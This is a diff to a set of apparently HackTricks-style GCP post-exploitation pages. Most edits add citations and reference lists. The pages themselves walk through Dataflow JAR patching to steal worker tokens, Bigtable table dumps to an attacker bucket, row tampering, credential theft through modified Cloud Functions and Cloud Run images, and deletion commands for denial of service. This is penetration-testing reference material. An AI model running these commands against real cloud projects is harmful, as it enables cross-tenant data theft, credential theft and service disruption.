+- Observed powerful permissions included **Compute disk/snapshot admin**, **GCS read/write across tenant buckets**, and **Pub/Sub topic publish**. Basic discovery uses the following command.<sup>[[1]](#references)</sup>
 
 ```bash
 gcloud compute disks list --project <tenant-project>
@@ -33,7 +33,7 @@ gcloud compute disks list --project <tenant-project>
 
 ### Snapshot exfiltration for opaque managed services
 
-With disk/snapshot rights you can inspect managed runtimes offline even if you cannot log into the tenant project:
+With disk/snapshot rights you can inspect managed runtimes offline even if you cannot log into the tenant project.<sup>[[1]](#references)</sup>
 
 1. Create a snapshot of a target disk in the tenant project.
 2. Copy/migrate the snapshot to your project.
@@ -42,12 +42,12 @@ With disk/snapshot rights you can inspect managed runtimes offline even if you c
 
 ### Dataflow dependency replacement via writable staging bucket
 
-- Analytics workers pulled JARs from a GCS staging bucket on startup. Because the Apigee SA had bucket write, download and patch the JAR (e.g., with Recaf) to call `http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token` and steal the **Dataflow worker** token.
-- Dataflow workers lacked internet egress; exfiltrate by writing the token into an attacker-controlled GCS bucket using the in-cluster GCP APIs.
+- Analytics workers pulled JARs from a GCS staging bucket on startup. Because the Apigee SA had bucket write, download and patch the JAR (e.g., with Recaf) to call `http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token` and steal the **Dataflow worker** token.<sup>[[1]](#references)[[4]](#references)</sup>
+- Dataflow workers lacked internet egress; exfiltrate by writing the token into an attacker-controlled GCS bucket using the in-cluster GCP APIs.<sup>[[1]](#references)</sup>
 
 ### Force malicious JAR execution by abusing autoscaling
 
-Existing workers will not reload replaced artifacts. Flood the pipeline input to trigger new workers:
+Existing workers will not reload replaced artifacts. Flood the pipeline input to trigger new workers with the following command.<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 for i in {1..5000}; do
@@ -56,20 +56,22 @@ for i in {1..5000}; do
 done
 ```
 
-Newly provisioned instances fetch the patched JARs and leak the Dataflow SA token.
+Newly provisioned instances fetch the patched JARs and leak the Dataflow SA token.<sup>[[1]](#references)</sup>
 
 ### Cross-tenant bucket design flaw
 
-Decompiled Dataflow code showed cache paths like `revenue/edge/<api|mint>/tenant2TenantGroupCacheDir` under a shared metadata bucket, without any tenant-specific component. With the Dataflow token you can read/write:
+Decompiled Dataflow code showed cache paths like `revenue/edge/<api|mint>/tenant2TenantGroupCacheDir` under a shared metadata bucket, without any tenant-specific component. With the Dataflow token you can read/write the following locations.<sup>[[1]](#references)</sup>
 
-- `tenantToTenantGroup` caches exposing other tenants' project+environment names.
-- `customFields` and `datastores` folders holding per-request analytics (including end-user IPs and plaintext access tokens) across all tenants.
-- Write access implies potential analytics tampering/poisoning.
+- `tenantToTenantGroup` caches exposing other tenants' project+environment names.<sup>[[1]](#references)</sup>
+- `customFields` and `datastores` folders holding per-request analytics (including end-user IPs and plaintext access tokens) across all tenants.<sup>[[1]](#references)</sup>
+- Write access implies potential analytics tampering/poisoning.<sup>[[1]](#references)</sup>
 
 ## References
 
-- [GatewayToHeaven: Finding a Cross-Tenant Vulnerability in GCP's Apigee](https://omeramiad.com/posts/gatewaytoheaven-gcp-cross-tenant-vulnerability/)
-- [AssignMessage policy - header removal](https://cloud.google.com/apigee/docs/api-platform/reference/policies/assign-message-policy)
+- [1] [GatewayToHeaven: Finding a Cross-Tenant Vulnerability in GCP's Apigee](https://omeramiad.com/posts/gatewaytoheaven-gcp-cross-tenant-vulnerability/)
+- [2] [AssignMessage policy - header removal](https://cloud.google.com/apigee/docs/api-platform/reference/policies/assign-message-policy)
+- [3] [Apigee security bulletins](https://cloud.google.com/apigee/docs/security-bulletins/security-bulletins)
+- [4] [View and query VM metadata](https://cloud.google.com/compute/docs/metadata/querying-metadata)
+- [5] [Dataflow overview](https://cloud.google.com/dataflow/docs/overview)
 
 {{#include ../../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
@@ -12,21 +12,23 @@ For information about App Engine check:
 
 ### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush`
 
-With these permissions it's possible to:
+These permissions expose App Engine Memcache operations:
 
-- Add a key
-- List keys
-- Get a key
-- Delete
+- `appengine.memcache.addKey`: Add a key
+- `appengine.memcache.list`: List keys
+- `appengine.memcache.getKey`: Get a key
+- `appengine.memcache.flush`: Delete all cached entries
+
+The App Engine role documentation lists these permissions, and the Memcache guide documents the corresponding console actions to add, find, and flush entries.<sup>[[1]](#references)[[2]](#references)</sup>
 
 > [!CAUTION]
-> However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, of from the a**pp engine running app**.
+> However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, or from the **App Engine running app**. The documented console workflow can add, find, and flush entries, while the runtime API can access the application's own Memcache.<sup>[[2]](#references)</sup>
 >
 > If you know easier ways to use these permissions send a Pull Request!
 
 ### `logging.views.access`
 
-With this permission it's possible to **see the logs of the App**:
+With `logging.views.access` and the companion permissions required by the target log view, it is possible to **see the logs of the App**. Cloud Logging documents `logging.views.access` as log-view access, and the command below streams App Engine logs.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 gcloud app logs tail -s <name>
@@ -34,7 +36,7 @@ gcloud app logs tail -s <name>
 
 ### Service and version deletion
 
-The `appengine.versions.delete`, `appengine.versions.list`, and `appengine.services.list` permissions allow managing and deleting specific versions of an App Engine application, which can affect traffic if it is split or if the only stable version is removed. Meanwhile, the `appengine.services.delete` and `appengine.services.list` permissions allow listing and deleting entire services—an action that immediately disrupts all traffic and the availability of the associated versions.
+The `appengine.versions.list` and `appengine.services.list` permissions allow enumerating versions and services; paired with `appengine.versions.delete`, an identity can delete specific versions. Deleting a version can affect traffic if it is split or if it is the only stable version, although the CLI refuses to delete a version that is currently receiving traffic. Meanwhile, `appengine.services.delete` (with `appengine.services.list` to discover targets) deletes an entire service and all of its accompanying versions, immediately disrupting that service's traffic and availability.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 gcloud app versions delete <VERSION_ID>
@@ -43,13 +45,22 @@ gcloud app services delete <SERVICE_NAME>
 
 ### Read Source Code
 
-The source code of all the versions and services are **stored in the bucket** with the name **`staging.<proj-id>.appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**.
+App Engine's deployment metadata includes a manifest of files stored in Cloud Storage, and App Engine creates a temporary deployment bucket named **`staging.<proj-id>.appspot.com`**. Deployments may therefore leave source artifacts in that bucket, but **write access alone does not grant read access**. Use the App Engine Code Viewer permission `appengine.versions.getFileContents`, or Cloud Storage permissions that include object reads, to inspect retained source artifacts and search for **vulnerabilities** and **sensitive information**.<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ### Modify Source Code
 
 Modify source code to steal credentials if they are being sent or perform a defacement web attack.
 
+## References
+
+- [1] [Roles that grant access to App Engine](https://cloud.google.com/appengine/docs/standard/roles)
+- [2] [Using Memcache](https://cloud.google.com/appengine/docs/standard/services/memcache/using)
+- [3] [Access control with IAM](https://cloud.google.com/logging/docs/access-control)
+- [4] [gcloud app logs tail](https://cloud.google.com/sdk/gcloud/reference/app/logs/tail)
+- [5] [gcloud app versions delete](https://cloud.google.com/sdk/gcloud/reference/app/versions/delete)
+- [6] [gcloud app services delete](https://cloud.google.com/sdk/gcloud/reference/app/services/delete)
+- [7] [Use Cloud Storage](https://cloud.google.com/appengine/docs/standard/using-cloud-storage)
+- [8] [Package google.appengine.v1](https://cloud.google.com/appengine/docs/admin-api/reference/rpc/google.appengine.v1)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-bigtable-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-bigtable-post-exploitation.md
@@ -11,7 +11,7 @@ For more information about Bigtable check:
 {{#endref}}
 
 > [!TIP]
-> Install the `cbt` CLI once via the Cloud SDK so the commands below work locally:
+> Install the `cbt` CLI once via the Cloud SDK so the commands below work locally:<sup>[[1]](#references)</sup>
 > 
 > <details>
 > 
@@ -25,9 +25,9 @@ For more information about Bigtable check:
 
 ### Read rows
 
-**Permissions:** `bigtable.tables.readRows`
+**Permissions:** `bigtable.tables.readRows`<sup>[[3]](#references)</sup>
 
-`cbt` ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.
+`cbt` ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.<sup>[[1]](#references)[[2]](#references)</sup>
 
 <details>
 
@@ -46,9 +46,9 @@ cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
 
 ### Write rows
 
-**Permissions:** `bigtable.tables.mutateRows`, (you will need `bigtable.tables.readRows` to confirm the change).
+**Permissions:** `bigtable.tables.mutateRows`, (you will need `bigtable.tables.readRows` to confirm the change).<sup>[[3]](#references)</sup>
 
-Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.
+Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.<sup>[[2]](#references)</sup>
 
 <details>
 
@@ -66,16 +66,23 @@ cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#133
 
 </details>
 
-`cbt set` accepts raw bytes via the `@/path` syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.
+`cbt set` accepts raw bytes via the `@/path` syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.<sup>[[2]](#references)</sup>
+
+> [!NOTE]
+> The current `cbt` reference documents Bash byte quoting such as `$'\xDE\xAD'`, but does not document `@/path` as file-loading syntax; verify the installed CLI before relying on that form.<sup>[[2]](#references)</sup>
+
+```bash
+cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=$'\xDE\xAD\xBE\xEF'
+```
 
 ### Dump rows to your bucket
 
-**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
+**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`<sup>[[4]](#references)[[5]](#references)</sup>
 
-It's possible to exfiltrate the contents of an entire table to a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control.
+It's possible to exfiltrate the contents of an entire table to a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control.<sup>[[5]](#references)[[6]](#references)</sup>
 
 > [!NOTE]
-> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).
+> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).<sup>[[5]](#references)</sup>
 
 <details>
 
@@ -101,18 +108,21 @@ gcloud dataflow jobs run dump-bigtable3 \
 </details>
 
 > [!NOTE]
-> Switch the template to `Cloud_Bigtable_to_GCS_Parquet` or `Cloud_Bigtable_to_GCS_SequenceFile` if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.
+> Switch the template to `Cloud_Bigtable_to_GCS_Parquet` or `Cloud_Bigtable_to_GCS_SequenceFile` if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.<sup>[[7]](#references)[[8]](#references)</sup>
+
+> [!NOTE]
+> Current Dataflow template documentation names `bigtableProjectId` explicitly in `--parameters` and uses a version-directory template location, so verify the template path and parameter schema for the version you invoke.<sup>[[6]](#references)</sup>
 
 ### Import rows
 
-**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
+**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`<sup>[[4]](#references)[[5]](#references)</sup>
 
-It's possible to import the contents of an entire table from a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control. For this the attacker will first need to create a parquet file with the data to be imported with the expected schema. An attacker could first export the data in parquet format following the previous technique with the setting `Cloud_Bigtable_to_GCS_Parquet` and add new entries into the downloaded parquet file
+It's possible to import the contents of an entire table from a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control. For this the attacker will first need to create a parquet file with the data to be imported with the expected schema. An attacker could first export the data in parquet format following the previous technique with the setting `Cloud_Bigtable_to_GCS_Parquet` and add new entries into the downloaded parquet file<sup>[[9]](#references)</sup>
 
 
 
 > [!NOTE]
-> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).
+> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).<sup>[[5]](#references)</sup>
 
 <details>
 
@@ -137,11 +147,14 @@ gcloud dataflow jobs run import-bt-$(date +%s) \
 
 </details>
 
+> [!NOTE]
+> The documented Parquet-to-Bigtable template reads Parquet from Cloud Storage and writes it to an existing Bigtable table, whose column families must match the input schema; its worker identity needs access to both resources.<sup>[[5]](#references)[[9]](#references)</sup>
+
 ### Restoring backups
 
-**Permissions:** `bigtable.backups.restore`, `bigtable.tables.create`.
+**Permissions:** `bigtable.backups.restore`, `bigtable.tables.create`.<sup>[[3]](#references)[[10]](#references)</sup>
 
-An attacker with these permissions can restore a bakcup into a new table under his control in order to be able to recover old sensitive data.
+An attacker with these permissions can restore a bakcup into a new table under his control in order to be able to recover old sensitive data.<sup>[[10]](#references)</sup>
 
 <details>
 
@@ -163,9 +176,9 @@ gcloud bigtable instances tables restore \
 
 ### Undelete tables
 
-**Permissions:** `bigtable.tables.undelete`
+**Permissions:** `bigtable.tables.undelete`<sup>[[3]](#references)[[11]](#references)</sup>
 
-Bigtable supports soft-deletion with a grace period (typically 7 days by default). During this window, an attacker with the `bigtable.tables.undelete` permission can restore a recently deleted table and recover all its data, potentially accessing sensitive information that was thought to be destroyed.
+Bigtable supports soft-deletion with a grace period (typically 7 days by default). During this window, an attacker with the `bigtable.tables.undelete` permission can restore a recently deleted table and recover all its data, potentially accessing sensitive information that was thought to be destroyed.<sup>[[11]](#references)</sup>
 
 This is particularly useful for:
 - Recovering data from tables deleted by defenders during incident response
@@ -189,17 +202,23 @@ gcloud bigtable instances tables undelete <table-id> \
 </details>
 
 > [!NOTE]
-> The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.
+> The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.<sup>[[11]](#references)</sup>
+
+> [!NOTE]
+> The current gcloud table-list documentation does not show a `--show-deleted` option; if it is unavailable, keep the deleted table ID from audit logs or another inventory and verify the command against the installed gcloud version.<sup>[[11]](#references)</sup>
 
 
 ### Create Authorized Views
 
-**Permissions:** `bigtable.authorizedViews.create`, `bigtable.tables.readRows`, `bigtable.tables.mutateRows`
+**Permissions:** `bigtable.authorizedViews.create`, `bigtable.tables.readRows`, `bigtable.tables.mutateRows`<sup>[[3]](#references)</sup>
 
-Authorized views let you present a curated subset of the table. Instead of respecting least privilege, use them to publish **exactly the sensitive column/row sets** you care about and whitelist your own principal.
+Authorized views let you present a curated subset of the table. Instead of respecting least privilege, use them to publish **exactly the sensitive column/row sets** you care about and whitelist your own principal.<sup>[[12]](#references)[[13]](#references)</sup>
 
 > [!WARNING]
-> The thing is that to create an authorized view you also need to be able to read and mutate rows in the base table, therefore you are not obtaiing any extra permission, therefore this technique is mostly useless.
+> The thing is that to create an authorized view you also need to be able to read and mutate rows in the base table, therefore you are not obtaiing any extra permission, therefore this technique is mostly useless.<sup>[[3]](#references)[[13]](#references)</sup>
+
+> [!NOTE]
+> Creating an authorized view does not grant access by itself; the current IAM workflow also requires `bigtable.authorizedViews.setIamPolicy` to change the view policy, and requests through a view stay within its defined subset.<sup>[[3]](#references)[[13]](#references)</sup>
 
 <details>
 
@@ -230,13 +249,13 @@ gcloud bigtable authorized-views add-iam-policy-binding card-dump \
 
 </details>
 
-Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.
+Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.<sup>[[12]](#references)[[13]](#references)</sup>
 
 ### Read Authorized Views
 
-**Permissions:** `bigtable.authorizedViews.readRows`
+**Permissions:** `bigtable.authorizedViews.readRows`<sup>[[3]](#references)[[14]](#references)</sup>
 
-If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will be probalby limiting what you can access from the table. Below is an example using Python:
+If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will be probalby limiting what you can access from the table. Below is an example using Python:<sup>[[12]](#references)[[14]](#references)</sup>
 
 <details>
 
@@ -281,9 +300,9 @@ for response in rows:
 
 ### Denial of Service via Delete Operations
 
-**Permissions:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`
+**Permissions:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`<sup>[[3]](#references)</sup>
 
-Any of the Bigtable delete permissions can be weaponized for denial of service attacks. An attacker with these permissions can disrupt operations by deleting critical Bigtable resources:
+Any of the Bigtable delete permissions can be weaponized for denial of service attacks. An attacker with these permissions can disrupt operations by deleting critical Bigtable resources:<sup>[[3]](#references)[[11]](#references)[[13]](#references)</sup>
 
 - **`bigtable.appProfiles.delete`**: Delete application profiles, breaking client connections and routing configurations
 - **`bigtable.authorizedViews.delete`**: Remove authorized views, cutting off legitimate access paths for applications
@@ -325,6 +344,23 @@ gcloud bigtable instances delete <instance-id>
 </details>
 
 > [!WARNING]
-> Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.
+> Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.<sup>[[3]](#references)[[11]](#references)[[13]](#references)</sup>
+
+## References
+
+- [1] [cbt CLI overview](https://cloud.google.com/bigtable/docs/cbt-overview)
+- [2] [cbt CLI reference](https://cloud.google.com/bigtable/docs/cbt-reference)
+- [3] [Bigtable access control with IAM](https://cloud.google.com/bigtable/docs/access-control)
+- [4] [Access control with IAM | Cloud Dataflow](https://cloud.google.com/dataflow/docs/concepts/access-control)
+- [5] [Dataflow security and permissions](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [6] [Bigtable to JSON template](https://cloud.google.com/dataflow/docs/guides/templates/provided/bigtable-to-json)
+- [7] [Bigtable to Cloud Storage Parquet template](https://cloud.google.com/dataflow/docs/guides/templates/provided/bigtable-to-parquet)
+- [8] [Bigtable to Cloud Storage SequenceFile template](https://cloud.google.com/dataflow/docs/guides/templates/provided/bigtable-to-sequencefile)
+- [9] [Cloud Storage Parquet to Bigtable template](https://cloud.google.com/dataflow/docs/guides/templates/provided/parquet-to-bigtable)
+- [10] [Manage backups](https://cloud.google.com/bigtable/docs/managing-backups)
+- [11] [Create and manage tables](https://cloud.google.com/bigtable/docs/managing-tables)
+- [12] [Overview of authorized views](https://cloud.google.com/bigtable/docs/authorized-views)
+- [13] [Create and manage authorized views](https://cloud.google.com/bigtable/docs/authorized-views-create-manage)
+- [14] [Cloud Bigtable Data API](https://cloud.google.com/bigtable/docs/reference/data/rpc/google.bigtable.v2)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
@@ -12,11 +12,13 @@ For more information about Cloud Build check:
 
 ### `cloudbuild.builds.approve`
 
-With this permission you can approve the execution of a **codebuild that require approvals**.
+With this permission, you can approve the execution of a **Cloud Build that requires approval**. <sup>[[1]](#references)[[3]](#references)</sup>
 
 <details>
 
 <summary>Approve Cloud Build execution</summary>
+
+Use the REST method below to submit an approval decision for the target build. <sup>[[2]](#references)</sup>
 
 ```bash
 # Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve
@@ -32,7 +34,12 @@ curl -X POST \
 
 </details>
 
-{{#include ../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [Cloud Build roles and permissions](https://cloud.google.com/iam/docs/roles-permissions/cloudbuild)
+- [2] [Method: projects.locations.builds.approve](https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve)
+- [3] [Gate builds on approval](https://cloud.google.com/build/docs/securing-builds/gate-builds-on-approval)
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
@@ -12,7 +12,9 @@ Find some information about Cloud Functions in:
 
 ### `cloudfunctions.functions.sourceCodeGet`
 
-With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function:
+With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function:<sup>[[1]](#references)</sup>
+
+The v2 API requires `cloudfunctions.functions.sourceCodeGet` on the function and returns a Google Cloud Storage signed URL.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
@@ -22,7 +24,9 @@ curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/loca
 ```
 
 ### `cloudfunctions.functions.delete`
-The `cloudfunctions.functions.delete` permission allows an identity to completely delete a Cloud Function, including its code, configuration, triggers, and its association with service accounts.
+The `cloudfunctions.functions.delete` permission allows an identity to completely delete a Cloud Function, including its code, configuration, triggers, and its association with service accounts.<sup>[[2]](#references)[[3]](#references)</sup>
+
+The API removes the function from any trigger that references it, but deleting the function does not necessarily delete the managed source bucket or its retained source versions.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 gcloud functions delete <FUNCTION_NAME> \
@@ -31,14 +35,22 @@ gcloud functions delete <FUNCTION_NAME> \
 ```
 
 ### Code Exfiltration through the bucket
-The `storage.objects.get` and `storage.objects.list` permissions allow listing and reading objects inside a bucket, and in the case of Cloud Functions this is especially relevant because each function stores its source code in an automatically managed Google bucket, whose name follows the format `gcf-sources-<PROJECT_NUMBER>-<REGION>`
+The `storage.objects.get` and `storage.objects.list` permissions allow listing and reading objects inside a bucket, and in the case of Cloud Functions this is especially relevant because each function stores its source code in an automatically managed Google bucket, whose name follows the format `gcf-sources-<PROJECT_NUMBER>-<REGION>`<sup>[[4]](#references)[[5]](#references)</sup>
+
+For second-generation functions, the managed source bucket instead uses the `gcf-v2-sources-<PROJECT_NUMBER>-<REGION>` pattern, with a possible CMEK suffix.<sup>[[4]](#references)</sup>
 
 
 ### Steal Cloud Function Requests
 
-If the Cloud Function is managing sensitive information that users are sending (e.g. passwords or tokens), with enough privileges you could **modify the source code of the function and exfiltrate** this information.
+If the Cloud Function is managing sensitive information that users are sending (e.g. passwords or tokens), with enough privileges you could **modify the source code of the function and exfiltrate** this information.<sup>[[2]](#references)</sup>
 
-Moreover, Cloud Functions running in python use **flask** to expose the web server, if you somehow find a code injection vulnerability inside the flaks process (a SSTI vulnerability for example), it's possible to **override the function handler** that is going to receive the HTTP requests for a **malicious function** that can **exfiltrate the request** before passing it to the legit handler.
+In practice, this requires source-update access such as the `cloudfunctions.functions.sourceCodeSet` permission.<sup>[[2]](#references)</sup>
+
+Moreover, Cloud Functions running in python use **flask** to expose the web server, if you somehow find a code injection vulnerability inside the flaks process (a SSTI vulnerability for example), it's possible to **override the function handler** that is going to receive the HTTP requests for a **malicious function** that can **exfiltrate the request** before passing it to the legit handler.<sup>[[6]](#references)</sup>
+
+The Python Functions Framework uses Flask request objects for HTTP handlers, reads `FUNCTION_TARGET` and `FUNCTION_SOURCE` for the entry point and source file, and wires the handler through the `run` view.<sup>[[6]](#references)[[7]](#references)[[8]](#references)</sup>
+
+The following example adapts the original `switcher.py` proof of concept to exfiltrate each request before invoking the legitimate handler.<sup>[[9]](#references)</sup>
 
 For example this code implements the attack:
 
@@ -140,5 +152,16 @@ def injection():
 ```
 
 
+## References
+
+- [1] [Method: projects.locations.functions.generateDownloadUrl | Cloud Run functions](https://docs.cloud.google.com/functions/docs/reference/rest/v2/projects.locations.functions/generateDownloadUrl)
+- [2] [Cloud Functions IAM Permissions | Cloud Run functions](https://docs.cloud.google.com/functions/docs/reference/iam/permissions)
+- [3] [Method: projects.locations.functions.delete | Cloud Run functions](https://docs.cloud.google.com/functions/docs/reference/rest/v2/projects.locations.functions/delete)
+- [4] [Build process overview | Cloud Run functions](https://docs.cloud.google.com/functions/docs/building)
+- [5] [IAM permissions for Cloud Storage](https://docs.cloud.google.com/storage/docs/access-control/iam-permissions)
+- [6] [Write Cloud Run functions](https://docs.cloud.google.com/run/docs/write-functions)
+- [7] [Functions Framework for Python: function registry](https://github.com/GoogleCloudPlatform/functions-framework-python/blob/main/src/functions_framework/_function_registry.py)
+- [8] [Functions Framework for Python: application wiring](https://github.com/GoogleCloudPlatform/functions-framework-python/blob/main/src/functions_framework/__init__.py)
+- [9] [serverless_persistency_poc: switcher.py](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
@@ -11,14 +11,18 @@ For more information about Cloud Run check:
 {{#endref}}
 
 ### Delete CloudRun Job
-The `run.services.delete` and `run.services.get` permissions, as well as `run.jobs.delete`, allow an identity to completely delete a Cloud Run service or job, including its configuration and history. In the hands of an attacker, this can cause immediate disruption to applications or critical workflows, resulting in a denial of service (DoS) for users and systems that depend on the service logic or essential scheduled tasks.
+The `run.services.delete` and `run.services.get` permissions, as well as `run.jobs.delete`, allow an identity to completely delete a Cloud Run service or job, including its configuration and history. In the hands of an attacker, this can cause immediate disruption to applications or critical workflows, resulting in a denial of service (DoS) for users and systems that depend on the service logic or essential scheduled tasks. <sup>[[1]](#references)[[4]](#references)</sup>
 
-To delete a job, the following operation can be performed.
+The `run.services.delete` permission deletes services, while `run.jobs.delete` deletes jobs. The `run.services.get` permission only allows viewing service details and does not grant delete access. <sup>[[1]](#references)</sup>
+
+Deleting a service removes all resources related to it, including every revision, and cannot be undone. <sup>[[4]](#references)</sup>
+
+To delete a job, the following operation can be performed. <sup>[[2]](#references)</sup>
 ```bash
 gcloud run jobs delete <JOB_NAME> --region=<REGION> --quiet
 ```
 
-To delete a service, the following operation can be performed.
+To delete a service, the following operation can be performed. <sup>[[3]](#references)</sup>
 ```bash
 gcloud run services delete <SERVICE_NAME> --region=<REGION> --quiet
 ```
@@ -27,13 +31,23 @@ gcloud run services delete <SERVICE_NAME> --region=<REGION> --quiet
 
 If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables.
 
-If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service.
+If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service. <sup>[[5]](#references)</sup>
+
+If the service references an image in an Artifact Registry repository and you have repository read access, you can pull the image locally for inspection. <sup>[[5]](#references)</sup>
 
 ### Modify & redeploy the image
 
-Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending.
+Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending. <sup>[[6]](#references)</sup>
+
+Cloud Run resolves a tagged image to a digest for a revision, and revisions are immutable; redeploying the modified image is therefore required to create a new revision. <sup>[[6]](#references)</sup>
+
+## References
+
+- [1] [Cloud Run IAM permissions](https://docs.cloud.google.com/run/docs/reference/iam/permissions)
+- [2] [gcloud run jobs delete](https://docs.cloud.google.com/sdk/gcloud/reference/run/jobs/delete)
+- [3] [gcloud run services delete](https://docs.cloud.google.com/sdk/gcloud/reference/run/services/delete)
+- [4] [Manage Cloud Run services](https://docs.cloud.google.com/run/docs/managing/services)
+- [5] [Push and pull images](https://docs.cloud.google.com/artifact-registry/docs/docker/pushing-and-pulling)
+- [6] [Deploy container images to Cloud Run services](https://docs.cloud.google.com/run/docs/deploying)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
@@ -18,11 +18,28 @@ Just accessing the metadata server you can obtain a token to access as the curre
 wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
 ```
 
